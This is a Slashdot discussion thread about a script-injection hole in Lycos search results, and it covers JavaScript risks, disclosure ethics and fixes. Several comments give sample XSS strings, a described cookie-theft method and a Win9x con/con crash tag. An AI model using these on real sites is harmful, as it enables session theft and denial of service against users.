Slashdot Mirror
Security Hole Lets Lycos Run Arbitrary JavaScript
JibbaJabba writes "Securiteam is reporting that a "security vulnerability has been confirmed in Lycos's Search Engine" which "allows malicious web site owners to cause JavaScript code (or any other HTML code) to get included in the search results displayed to the end user by Lycos". They also state that "other engines are suspected to be vulnerable as well". Anyone tried google yet? The original bugtraq report by Sentry Labs is available here." Proof once again that the jerks have more spare time then the people who actually do something worthwhile.
Yeah, sure, Javascript is harmless. Click here for proof you're wrong.
Could someone use this to embed an HTML comment character in their description to prevent further search results from being displayed?
If jerking is outlawed, only outlaws will have jerks!
EMCAScript (formerly known as JavaScript) can in fact be used to propogate spam. It is widely deployed in freely downloadable browsers such as NetScape and Internet Explorer. It is turned on by default. Struggling eCommerce web sites use applets to gather valid email addresses. In one documented case a real estate agent presented a talk on how to use a JS applet to troll casual web site browsers for valid email addresses. The thought being that anyone who spends a fair amount of time browsing online real estate ads is probably looking for a house the return to the web site is valuable: pre-self-filtered valid email addresses. The next morning you wind up with mortgage spam, moving company spam, etc. It does not take much imagination to see where such marketing ploys will go if they fall into the wrong hands. Do you actually like spam? Do you want to see more of it clogging the 'net? Then be sure to surf without turning off JavaScript in your browser.
I don't think I'm buying into this "they are only showing you how bad your stupid code is." reasoning anymore. ALL code is flawed, so taking advantage of it is like pushing down someone you meet on the sidewalk and saying "I am only showing you how poor your center of gravity and sense of balance are!" No, that is not a reasonable line of thinking. If you want to make something better, show the makers what's wrong, and post publicly if it is not taken care of. all of the rest of this is some kind of ego-run-amuck b.s. about trying to _be_ "Neo" hacking "the man". and it is _very_ juvinile. I spend FAR too much of my time trying to make sure that my servers are pactched and my virus files are up to date and my users are not sending out company data to outside sources that don't need to know. It takes away from a sys. adim's time that _should_ be spent watching company information flow and user environments to look for ways to help it improve the company. NOT making sure that the 13 year old kid that just got out of school isn't making sure I know that IIS has a buffer overflow problem that gives him all of my customer's credit cards. Not ALL information was meant to be free. If you disagree please feel free to apply for wireless service from verizon or AT&T and learn all about how "helpfull" these "security advisors" really are.
- A.P.
--
"Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
Then I would feel much less nervous, as a sysadmin.
- A.P.
--
"Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
I don't think there there is another means presently known to redirect the user directly from the list of results within a search engine before the user ever actually clicks on any of the results. Maybe you misunderstood what I wrote or I wasn't clear in what I meant - or maybe I'm misunderstanding you now. How can you go about redirecting users from the page within the search engine that shows the first few results without using this Javascript exploit?
How the things that I listed differ from the things listed by the original poster are that the original poster considered the most nefarious possibility of redirection to be an annoyance (in the same way that porn sites flood you with annoying popups [from what I've heard]) whereas I suggested that a much worse use of redirection would be to deceive the user. The key is that the user thinks he is still on Lycos when he is not and this opens up a whole can of worms. Perhaps you consider this "harmless" because you think people who don't look up at the URL location of each web page they visit are stupid, but when you click on the "Search" button of your favorite search engine how many times do you look up at the location to see that the results are indeed from where you expect?
The third possibility you mention is not likely at all to work as people don't have to login to use a search engine.
Lycos does have web based email, which quite a few people use, and I think they have some other services that require registration as well. I would wager (based on Bayes' theorom) that people using Lycos for searching are more likely to have Lycos webmail accounts than the average internet user.
-----
Free P2P Backup, Windows & Linux
Redirection could be used for more than just annoying purposes. The thought can comes to my mind right away is that it could be used for deceptive purposes:
-----
Free P2P Backup, Windows & Linux
And more to the point, since JavaScript can read cookies, any active logins to the search engine site could be sent by the rouge JS to a third party.
--
"Hot lesbian witches! It's fucking genius!"
When vendors ship operating systems that are inherently insecure, they're loudly blasted for doing such, and the administrators of those systems are often held responsible for "locking down" the default-insecure configuration. This is considered well, good, and normal by a great many folks, esp. here on /.
It may be that 90% of the people out there don't know what Javascript is, but I should hope that the percentage of /.ers that don't know anything about Javascript would be far, far, far less. I may be wrong (in fact, I probably am, considering that at least one person thought my original comment was a troll -- they're probably thinking "JAVASCRIPT RULZ DOODZ! U SUX!" when they read anything critical of Javscript or other client-side code), but I hope not.
You can't really blame the graphical browser vendors. Many sites require javascript to do trivial operations: to follow a link, to submit a form, etc. Many of the same end-users who don't know what Javascript is or that you CAN turn it off end up being those who shout for it loudest when it is disabled. It's scary when someone, in all apparent seriousness, claims that they use $BROWSER[A] because $BROWSER[B] allows Javascript to be disabled, and they don't think that's right.
A couple of times I've pushed further, and learned that "well, the web-developers wouldn't use it unless it was safe, so you're just full of it when you say that there are risks involved!" -- and I imagine that most of the folks who write Javascript do so because they need it to provide the behavior required by those same users.
So, yes, it's a bit much to expect any one newbie to know enough to disable Javascript. But that shouldn't apply here, right?
As I said, this isn't anything unexpected. Those who pay attention already disable Javscript and go around making sure the folks they care about know that Javascript can be disabled. So anyone that anyone on /. knows that has Javascript enabled either has (1) done so knowing the risks or (2) has really crappy friends/acquaintances.
Personally, I'd be happy to have a Javascript Guru devise a better resource-consumption script than what I currently have:
Pick One: http://www-rohan.sdsu.edu/~stremler/sigs/sigs.html (Note - disable Javascript first!)
Stupid Slashdot. I tell it i want "Plain Old Text", but it still thinks < and > surround tags, and that < and > are symbol codes. Sigh.
My middle paragraph should read:
Unfortunately, the Lycos bug is exactly the opposite. Instead of them taking < and >s, and failing to turn them into < and >, the problem is that Lycos is finding web pages with < and >, and turning them into < and >, thus changing non-HTML into HTML. A much less common problem, and also one it seems like they have TRIED to create. Why parse the HTML symbol codes into the symbols they represent? It's a strange bug, and its obscurity is why it's taken so long to come to light.
One could assume that you're not a grammar consultant.
Great job, you really addressed 90% of the issues with stupid CGI programmers. I have dealt with the same problem in CGI that I've "inherited", and it's a pain in the ass to see such a simple exploit go unpatched.
Unfortunately, the Lycos bug is exactly the opposite. Instead of them taking s, and failing to turn them into < and >, the problem is that Lycos is finding web pages with < and >, and turning them into , thus changing non-HTML into HTML. A much less common problem, and also one it seems like they have TRIED to create. Why parse the HTML symbol codes into the symbols they represent? It's a strange bug, and its obscurity is why it's taken so long to come to light.
One thing to note, though, is that this bug probably would have been found months, if not years, ago if Lycos was OSS.
Extraordinary Vacations. Exceptional Prices
just think.
Extraordinary Vacations. Exceptional Prices
The danger comes from sites that base their authentication schemes on persistent cookies after the user has signed-on once.
Such cookie basically tells the server "hey i'm the right guy now gimme my personalized page".
You can use javascript to sniff the cookie via document.cookie and send that value to a cgi script that'll store it.
heh fun.
Extraordinary Vacations. Exceptional Prices
Once the user would click on that link, it would take them to the spell-checker interface of hotmail, but the 'word' passed to that CGI is actually HTMLcode that gets "echo'ed" as part of the "result page", just like any dictionary interface would do. That HTML code could be a SCRIPT tag downloading a .js javascript file from the perpetrator's server (to keep it clean) which could very well sniff a user's document.cookie and change the location of some hidden image on the page or pop a window by making an HTTP request to some evil CGI and passing the value of that document.cookie string as a parameter and store it in some text file.
The victim's cookie string most likely contains information that tells the server "hey i'm authenticated" so all it takes is for the evil person to reproduce that cookie.
As I browse the web, I find such vulnerabilities on member-driven sites all the time, some times I warn the webmaster, some times I don't bother, but it can potentially be pretty nasty. I even got a t-shirt from some mildly popular online community fedexed to me once after I rode their asses likes a madman so they'd finally plug a really *really* bad similar hole.
I found one in some remote feature of yahoo a few weeks ago, but its very small and I doubt anyone else would find it.
The rule of thumb to always follow as you design your web application, is "what is that HTML i'm sending to the user made of?". "is there any content in there that is taken from any kind of user input?". "if yes, am I filtering out all angled brackets?". "if i am allowing for user-input HTML content, am i filtering all unnecessary tags and among the tags i'm allowing am i filtering all unnecessary attributes (onload,onmouseover,onclick)?"
Extraordinary Vacations. Exceptional Prices
A troll, on the other hand, is sometimes disguised as a somewhat coherent expression of opinion but doesn't really represent the poster's opinion, it's just designed to get a lot of people worked up replying to it so that the original poster can laugh at them wasting their time and tell himself how clever he is for having done so.
What they have in common is the level of maturity (low) and the lack of positive contribution to the discussion.
And then there are the 12 year olds who keep trying to sneak in links to stuff other than that to which the link appears to lead, and all the other posts associated with those posts, which are just another immature attempt to annoy people and waste their time. Off-topic covers these just fine.
None of this necessarily has anything to do with how posts actually get moderated.
I see even classic Slashdot is now pretty much unusable on dial up anymore.
That's a bit disingenuous. JavasCrypt is enabled by default in all graphical browsers. 90% of people out there don't even know what it is, much less how to turn it off (turning it off in Netscape is fairly easy, but turning it off in IE is extremely non-obvious, even if you know you're looking to kill JavaScript).
Schwab
Editor, A1-AAA AmeriCaptions
3. Bayes Theorom. A probabilistic method of medical reasoning.
.....This can tell you something about the probability of 1 person having a disease because it gives you the probability of the population having the disease.
.....This can tell you how accurate a positive or negative test outcome is. (the sensitivity can tell you how often the test will positive in a person with disease; the specificity can tell you how often the test will be negative in a person without disease.)
à
This is a way to decide how to treat disease by knowing about the rate of the disease and how good your test is.
à
Diagnosis based on:
Prior Odds (or base rate of disease)
Characteristics of a diagnostic test (sensitivity and specificity)
à
Here is a scenario: You work in an area with a relatively high rate of Lyme disease. You have a test for Lyme disease and a patient you want to test. You could decide whether your patient has Lyme disease simply on how common Lyme disease is (prior odds). With the test as the diagnostic tool, you could only base your diagnosis on the outcome of the test and how good the test is. Using both pieces of information is a better approach.
à
Know Sensitivity and Specificity. (As defined in the basic experimentation lecture)
à
Bayes Theorom can also help you to update your decision-making when new info comes around.
Search first, ask questions later.
Wait a sec. If girls only go out with jerks, and never with "nice guys," that would mean that sys admins would be getting all the girls. And I know that ain't so.
I dunno, I'm not sure that a little 69 really ever caused anyone harm.
-josh
That's it. End of story. If browsers let you do that, we'd all be happy.
What? I can't? Shoot, I'd better turn that off then! :-)
Konqueror has exactly this option - you can tell it to disallow opening new windows completely, to have it ask, or to allow javascript window.open() always. Handy little feature...
---
Hacker Public Radio is our Friend
How about "wrong story" instead? How did this get moderated up, anyway?
Remember: it's a "Microsoft virus", not an "email virus",
Your right to not believe: Americans United for Separation of Church and
"Search warrant."
Fly away, little BSA bird.
I am very small, utmostly microscopic.
Hyper Text Markup Language
it's a stateless language, but a language nonetheless.
Just raise the taxes on crack.
jeez, thank goodness you're on the good side, or at least it would seem..
Just raise the taxes on crack.
I am a believer in the thin-client approach to web-pages and that is if you can't do it on the server and you can't use HTML for your web page then you are probably doing something wrong. This is my opinion and you don't have to share in it.
Jumpstart the tartan drive.
And re-read Steven Levy's book Hackers while you're at it.
--
Poliglut
Plus, it's faster then NS4 rendering /. in nested mode!
Pope
What? Bear is driving car? How can that be?!
It doesn't mean much now, it's built for the future.
Proof is a noun. Prove is a verb. Keep that in mind, will ya?
That's a bit disingenuous. JavasCrypt is enabled by default in all graphical browsers. 90% of people out there don't even know what it is, much less how to turn it off (turning it off in Netscape is fairly easy, but turning it off in IE is extremely non-obvious, even if you know you're looking to kill JavaScript).
In IE, it's under Security, which is the obvious place to have it. Particularly if you don't know *what* Javascript is; all you have to do is set your security to high - you don't have to worry about the details.
Simon
Coming soon - pyrogyra
That's correct. To really annoy Win9x users, just put an tag in your websites with the SRC set to "file://c:/con/con" like this:
<IMG SRC="file:/c://con/con">
How does *Microsoft* force you to enable cookies to view *Starbucks*?! Cookies were invented by Netscape anyway, you know, and there's absolutely nothing unsafe or strange about them despite all the FUD.
/something.php3 becomes /something.php3?youAre=dude123 and every link adds that ?youAre=dude123 part to it. You can now be identified between link clicks. 99% of all cookies are simply used for session tracking. Only idiots programmers would actually store any DATA of relevance in them (like a credit card number, home address etc.)
A cookie set by a server can only be read by that same server. The exact same effect can be done by URL rewriting (adding a token to each url.. as in..
Not all the facts were stated by the person to which you replied. Windows XP Home Edition does not feature different access levels. All users are Administrators. Windows XP Professional retains different access levels.
See: http://www.microsoft.com/windowsxp/guide/compariso n.asp
"Be Happy or Die." -- AoN
Konqueror has exactly this option - you can tell it to disallow opening new windows completely, to have it ask, or to allow javascript window.open() always. Handy little feature...
OmniWeb for OS X has it beat, with a setting to open the window only if it was requested by a user action. I can go to a site like the The Onion and have its left-hand bar popups like Horoscopes open just fine, but I have never, ever seen a popup ad.
If you want to see javascript abuse in action, go to somethingawful.com and look for an awful link of the day. If there's a guestbook available, you'll see dancing goatse guys and everything. Er, wait, nevermind.
Imagine, you do a search, and while you're sitting there looking at the search results, you get popup ads being generated by the sites in your results list. Now imagine that the search hit a lot of porn sites. And they have exit traps.
Hopefully, the search engines get this remedied quickly. I imagine they'll just filter out javascript.
-Todd
---
"The details of my life are quite inconsequential..."
Automatic JavaScript on and off based on URL might be OK, but I want a button down in my tray where I can easily turn it on and off -- with, of course, indication of state.
Slashdot rumor has it that Microsoft toyed with this idea for a while and then dropped it when it internally became known as the "porn button". Vote for (or help us fix) one or both of these if you'd like to see the feature added to Mozilla:
bug 38521 Preferences Toolbar, for most commonly used prefs
bug 87538 [RFE] preferences buttons on status bar
The shareholder is always right.
Even if you did that, a web site that found a major security hole in your browser would be able to steal your Slashdot password...
The shareholder is always right.
don't forget to change a quote (") into "
And it might also be a good idea to turn & into & while you're at it.
Btw, I don't think you need to do the < and > transformations for attributes, but it doesn't hurt.
The shareholder is always right.
This link is a fine example... difficult to get out of on Microsoft browsers.
Only on Microsoft browsers? I don't remember finding a browser where I could get out of that kind of loop.
See bug 59314, "Alerts should be content-modal, not window-modal", for fixing this in Mozilla.
The shareholder is always right.
Cmon, that's just sloppy.
:).
<? $page_description = strip_tags($page_description);?>
Problem solved.
I love PHP
Ya think? PHPLIB has been OSS for a long time and only recently programming problems of the above type were found in it.
OSS isn't the magic elixir. It's a step in the right direction.
You also forgot that you need to remove quotes as well.
When it helpfully fills in a text box, you have to escape the quotes. Take this example:
Now we craft the malicious string ( " onfocus="alert('howdy'); ) and place it in the text box like so:
See also my article on Accepting input and malicious script insertion.
Lots of sites are vulnerable. Lots of sites have lazy developers.
I can't seem to find the relevant logical definendum and differentia in the Jargon File or elsewhere. What exactly is the difference between a flamebait and a troll?
--
NetInfo connection failed for server 127.0.0.1/local
and that quote illustrates why. If you live in a small town where nobody locks the doors, it's not reasonable to walk into someone's house uninvited. If you connect your computer to a global network and program it to accept TCP connections on certain ports, it is reasonable for people all over the world to connect to those ports.
I wonder if Stoll originated the nonsensical comparison between 'unauthorized access' of a corporate/governmental computer and breaking into someone's house. They're not the same at all, but this silly notion underpins a lot of bad thinking and bad law. Stoll was zealously protective of the 'computing resources' of a huge government lab at a time when 'real computers' were out of reach for ordinary people. He could be compared to a royal chef in the middle ages urinating on the excess food from the royal table lest a commoner eat it.
I don't agree that security problems have made the web 'experts only'. If you want to run your own web server and you're not an expert, run vanilla Apache and sshd and nothing else. Actual holes in Apache are pretty rare. Or am I missing your point?
Rubbish.
1) Where was it getting the email address from? If the user typed it in it's their fault, and I fail to see where else it would get it from.
2) There's no such thing as a JS "applet". Applet refers to a client side embedded Java application, no relation to JS at all.
---- Den ene knappen er powerknapp, den andre er Bender voice knapp "Bite My Shiny Metal Ass"
Nowadays when I build forms I always set a max length. This keeps people from doing the things I did when I was 15
Hollow words will burn and hollow men will burn.
This article was just posted, but then disappeared from the home page. Interesting.
Got Rhinos?
This isn't a serious security breech, just an annoying oversight by Lycos programmers which will probably be patched up in the next fifteen seconds.
Got Rhinos?
I sent my friend to Yaromat's "Wanna be an apple?" when he was stoned and he damn near had a heart attack.
XML is like violence. If it doesn't solve the problem, use more.
The javascript hole doesn't work on google, but I found an even worse bug that allows you to pass along ASM in a search string!
Sure cant. The most that can be done is the playing of sounds on a end users hardware. Beyond that nope..
/think ;)
Gotta love random
Jeremy
In a browser, VBScript is harmless.
Dont confuse VBScript with an ActiveX control
THey are totally different.
And of course if you can get a VBScript to the windows script host its all over but the crying... doing that from a browser is something id like to see however
Jeremy
*sigh*
In the context of the browser VBScript executes with the same permissions as JavaScript... PERIOD!
You cant create a file system object using a VBScript in a browser. It takes more than most people think to damage a machine with just VB/JavaScript. You have to use "social" engieering more than anything and trick people more than you cna directly harm their systems.. think about it
Why don't you show me some VBScript runs from a web page that can do something malicious. Ill gladly run it on my machine and click NO if its an ActiveX object and simply laugh at anything else since it simply WONT work in the browser.
Outlook has totally different access privileges why do you think all of these worms are spread. Do you know the mayhem that would be caused if ever IE browser was exploitable via VBScript?
Stop and think before trashing something for an unfounded reason.
Jeremy
I think a lot of those of us who post to slashdot would be in trouble if jerks were outlawed.
I'd certainly flee to Canada if that happened.
But then Canada would be populated with jerks...
Perhaps we could all flee to Australia? Then Australia would have THREE social classes -- descendants of British "criminals," aborigines, AND jerks!
Bah, nevermind...
That's a bit disingenuous. JavasCrypt is enabled by default in all graphical browsers.
Actually that's not quite true. Konqueror very deliberately keeps JavaScript, Java and Netscape plugins off by default. If you need them, then it's a cinch to enable them (very obvious in the Konqui settings dialog, or, if you have the extra plugins that are in the kdenonbeta package, it's even simpler, select a menu item or a toolbar button).
If you're concerned about turning JavaScript on globally, then you can enable/disable JavaScript (and Java) on a per-site basis.
Sigh... If only every graphical browser put security first...
--
I'd rather be lucky than good.
"Proof once again that the jerks have more spare time then the people who actually do something worthwhile."
Don't be so hard on yourself there CmdrTaco! We read your drivelous comments just the same 8^}
And BTW - it's 'than' the people, not 'then' the people.
Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
And if you're putting the results in <INPUT TYPE="TEXT" VALUE="Something The Use Entered"> don't forget to change a quote (") into ". Otherwise you can still get weird results, especially because you can insert new attributes (maybe do something even via onclick="something_nasty()" at that!)
--
You are in a maze of twisty little relative jumps, all alike.
For the love of Jebus, with all the ways JavaScript can be abused, why don't the browsers come with a way to filter out the most obnoxious actions? I'd love to see checkboxes for the following.
Disallow new window creation
Disallow window moving and resizing
Disallow redirection
Disallow shortcut creation
[I nearly blew a gasket the first time I found that a site had placed porn and casino links in my Start menu.]
Disallow access to cookies
There are probably others, I'm no JavaScript whiz.
An ideal browser would let you toggle all that stuff, and then enable it for specific sites of your choosing.
I'll have to look at Web Washer again... maybe it lets you re-enable pops for the sites that need them.
Does "other HTML code" include ? If it does... poor IE users.
I think you underestimate just how much I just dont care.
I've never seen so many mistakes in one sentance The irony of the title of that post has officially blown my mind.
Where are we going and why am I in this handbasket?
<a href="friskit.com"> <img border=0 src="http://friskit.com/site/images/logo.gif"> </a> <script> document.body.style.filter= "progid:DXImageTransform.Microsoft.Blur (pixelradius=3)"; </script>
No. It's proof that dotcommers are in such a rush to be first and get all kinds of attention that they are sloppy. Maybe if we all stop trying to accomplish everything at the pace of eBusiness, this sort of nonsense will get caught in the process.
I do not have a signature
It's not a goatse link. It goes to altavista.com.
wow. once again I recall why I avoid windows ie. :) (posting from macos 9.1, ie5)
um. inside ie, you can selectively discriminate between sites for javascript. you can setup Trusted Sites which get to run JS and ban others.
actually, JS can't create shortcuts. that'd have to be one of the other IE scripts, jscript or vbscript or something.
my old sig used to be funny, but then slashcode ate it and now it's not funny anymore
dejanews? have you been paying close attention to news on google's site in the past year or two? :)
hey, at least lycos hasn't been bought yet. sure it sucks but... ;)
my old sig used to be funny, but then slashcode ate it and now it's not funny anymore
"No really, it just appeared on my screen"
"Son, I know better than that, now go to your room!"
Burn Hollywood Burn
CERT® Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests
From how I understood the advisory, it refers to a page that automatically displays info directly from a link, like showing the search string on the search results page. If the displayed string contains script, the script will be executed in the client browser.
----
searching Lycos for:
:-)
<b>Oooh+Bold+Text </b><script>alert('Ew ww nasty popup')</script>
was good for a laugh
"The Most Fun Possible on 4 wheels" is at SunBuggy in Las Vegas
No code is flawless. That doesn't mean all code is equally flawed as you seem to be suggesting!
You either knew you'd be working with IIS when you took the job, or you suggested IIS yourself, or you stood idly by and let your boss walk all over you and dictate that you install it. So quit complaining about your sad but entirely avoidable situation. Especially since you probably earn extra money for having to put up with Microsoft products instead of actually enjoying your work like many of us do. I mean, sure, it's tough if applying the weekly IIS patch is interfering with your "watching company information flow and user environments to look for ways to help it improve the company" [translation: configuring the firewall so you can play Quake from your office] but applying those hourly NT patches IS YOUR JOB, in a way that whining on Slashdot is not.
Running NT on a public network of any kind is like bending over to pick up soap in the prison shower. I'm continually amazed at the outrage, incredulity, and disbelief I hear from people who have chosen to install server software that seems to have been written from the ground up to support remote execution of worm code by sociopathic teenagers.
This reminds me of some stuff my wife encountered while receiving messages through Yahoo Mail. Whenever someone used the word "medieval" in the message body of an email, Yahoo replaced it with
medireview
and it would show up that way in the browser. So she thought nothing of it until she noticed that Yahoo also changed the word expression into statement! So if someone wrote
Medieval art was limited in its expression
in an email, Yahoo turned it into
Mediereview art was limited in its statement
So she wrote Yahoo asking them what was up. This was their response:
Hello,
Thank you for writing to Yahoo! Mail. To help ensure the highest level of security, words that can be interpreted as JavaScript commands are replaced by an alternate word (with the same or similar meaning) when using HTML formatted email. This also happens when viewing documents using our HTML file viewer.
JavaScript should be taxed!
I don't know if this thread is on the security of Lycos or the security and handling of scripting. So about lycos. They're just displaying links and desriptions so all scripting should be filtered out of there entries. They need to improve on there filtering methods.
Ok. There's been a lot of talk about all the bad in scripting. It's gotta have some good uses. I think it does.
For instance any type of use of dHTML needs some type of scripting involved. Forms that dynamically change content as it's being filled out are good as they save the user time and makes it easier for them to fill out. 90% of the users I support only want to focus on the task at hand and not have to figure ways around doing that task. The biggest request I get is Can it be made easier.
That's how the business and user world is. And it's those two worlds that most of the internet is geared towards.
I think Microsoft was on to something with the whole OS as Browser thing but when it about it wrong. It should be the Browser as an OS. Here's what I would like to see happen.
A browser that implements scripts to run srictly inside the browser in a protected sandbox. The browser starts with a main top level page and any subsequent windows opened inside of the browser open over the top level page. The browser should have a setting on how many child windows can be opened at a time. (Opera seems to be headed in that direction but the windows are either all maximized or not. Strictly MDI.) Scripts being abled to be compiled to byte code. The browsers should have an option that can be set as to whether or not it will start with a VM for scripts preinitialized for the byte code or not.
Kinda sounds like Java applets. But Java applets require to much overhead compared to scripts. A browser like I want will probably use more overhead too but it will all be initialized when it is opened. Java provides some of the functionality but there's one major problem I haven't overcome. I can't find out any documentation that allows for java to get access to the full DOM. I've seen some on Sun's site but it's very limited. If it had as much as scripting does then I think it would be used more. Then you get a little more security than you can get with scripts. If anyone knows about this please let me know.
.Net seems to be headed this way and provide this but I'm still checking and it's to early to tell yet. If so aside from the subscriptions it's a good thing.
My boss just asked me if I could look into directing traffic to our website.
Knowing this, I could index all of our pages with porn keywords and redirect users to our page selling Office Furniture!!!
I'll be sure I send out OfficeFurniture.vbs just in case Lycos fixes this hole before I get a chance at a promotion.
"Communism is like having one [local] phone company " - Lenny Bruce
Combine this with the payola that puts certain for-a-fee pr0n sites at the top of the list, and little Timmy doing a search for his latest book report on "naked singularity" is going to have 20 very confusing new windows pop up on his screen that make him have strange feelings faster than you can say "Tentpole".
Second, for everyone who's saying how harmless JavaScript is, you're somewhat right, but it doesn't matter. Why? Because the person releasing the vulnerability was just using JavaScript as an example. It could also be VBScript, just as easily...and THAT is NOT harmless by any stretch of the imagination. Imagine doing a search on Lycos, and getting smacked with a new variant of KAK.
For your security, this post has been encrypted with ROT-13, twice.
I was arguing that HTML is not a language in the programming language sense
Make It Secret . Free JavaScript implementation of AES for your browser
JS on the other side, hasn't an easy way to access sensitive data or create malicious code. As someone noted before, you can redirect the user to a porn site or something, but its rather dificult (I'm not a JS programmer, just done a couple of hacks with it) to access to sensitive information, such as the hard drive
Make It Secret . Free JavaScript implementation of AES for your browser
A whole new way to for annoying pop-up ads to advertise themselves. Before you even surf to the luzer website, BAM! there it is in front of your Lycos search!
If microsoft put this feature in IE it would disable their entire site.
www.facestat.com - See how strangers judge you.
The simple fact is that content you get from the Internet, be it Slashdot, Lycos, Microsoft, or anything else, may have been altered or may be malicious in itself. If you care about it, you have to deal with it by picking your web client to protect you; trying to insist that every web site is secure and trustworthy is a losing battle.
BTW, from the description of the bug, JavaScript is the least you have to worry about. ActiveX controls would seem like a much bigger problem. And web sites that server user-supplied JavaScript through SSL are also a much bigger worry (since the user-supplied JavaScript is implicitly signed with the site certificate); at least Lycos doesn't serve its content through SSL.
This one's been around for years, and is present on literally millions of sites. I read somewhere certain both AltaVista and Amazon have both suffered from this in the past. Here's how it works:
:)
You have some kind of form input, with the next page displaying whatever the user typed into that form field (for a search engine this would be in the form of "You searched for..."). the golden rule of web development is NEVER TRUST input from your users. Most developers take great lengths to check anything that's going into a file or database, or erspecially code that will be executed on the command line.
However, if you're just going to display something to the user that typed it why bother checking the content? Surely only the user who typed the thing is going to see it again, and it's not like they're going to be able to affect any of your systems?
Therein lies the problem. If you allow a user to type anything into a form and then have it re-displayed, they can include HTML tags. And if they can include HTML tags, they can include <script> tags. And script tags can do weird stuff.
Still think it's not a problem thanks to the fact that only the user will see it? Think again - seeing as most applications like search engines use GET to pass parameters, you can fill in the form for the user by offering them a link to click:
http://yoursite.com/search?<b>Oooh+Bold+Text </b><script>alert('Ew ww nasty popup')</script>
All of a sudden you can cause your weird popup messages to appear on someone elses site.<p>
The biggest security problem is the fact that javascript can access cookies. Imagine sending someone to a website via a link containing javascript that reads their username/password cookie for that site then pops up a window feeding that username/password to a script page con your server (in the query string) - BANG, you've got their password.
How do you stop this happening? Simple - deactivate HTML tags from user input by replacing < with < and > with > - problem solved
Who the --- uses Lycos anyway? Yahoo. Google. DejaNews.
Javascript is useful, no doubt there. Takes all sorts of loads off servers. The main annoying part of it (which is the real issue here, and the reason exit traps are such an annoyance) is that you can't just disable javascript's ability to open new windows whilst leaving the rest of its abilities intact. grrrr.
That's it. End of story. If browsers let you do that, we'd all be happy.
As well as Konqueror. Mozilla, on the other hand, brings the window up slow enough that you can go to another page while you wait.
Then what does the "L" stand for?
-1, Troll (self-moderated)
guess thats waht we should expect from someone at san diego state. phhpt, cmon, you're being rediculous. the internet allows people access to others machines, should we shut it down? no...just fix things. Java is cool, and anything that is cool can be turned bad, thats life... lets fix it, not kill it. like tigers, tigers are cool, but I dont kill them even though they may like to eat me. San diego state, really....
________________________________________________
This link is a fine example... difficult to get out of on Microsoft browsers.
Click this
HTML is only a "Mark-up Lanuage", it changes the format of the text displayed on the page, it quite easy to make sure the formating doesn't do anything besides formating.
JavaScript does alot more, i.e., open new windows, change content based on where the mouse is, etc. The security hole is just that a site can make the resulting search result page contain javascript code that will be run. This requires you to have Javascript enabled on you browser, if not, there is no issue. Without this 'security hole', you would also be 'exposed' to the javascript, if clicked on the link to that site.
Looking for any old 8-bit Heathkit/Zenith software/hardware - http://heathkit.garlanger.com
Ouch! Don't do that! The link showed up as 'visited' in my browser! And I'm sure I flushed my cache last week...
I get the same problem with that Oracle ad. It seems to happen with doubleclick ads.
Can't be sure tho'
PS. why is /. using evil doubleclick?
Sorry if I don't get it, but is this really a
security issue?
Looks more like an "undocumented feature" of the
engine. Granted, perhaps only spammers and pr0nners might want to use it.
I try to keep up with the security alerts; I'd
say somewhere around 5 to 10% of them elicit a
response of "Uh, so what?" from me.
Maybe I'm just to ingorant to get it.
Who the hell's making 80K/yr?
/.ers.
I'll bet not very many
IT/IS managers maybe.
::Proof once again that the jerks have more spare time then the people who actually do something worthwhile.::
I'd say that 9 times out of 10 this sentiment is expressed, the jerks actually ARE doing something worthwhile, by forcing complacent developers to get themselves into gear and improve the way things work.
I'm not so into languages, but why is it so hard to make this language secure? HTML is secure, so why not this too?
maddjn
--EOF--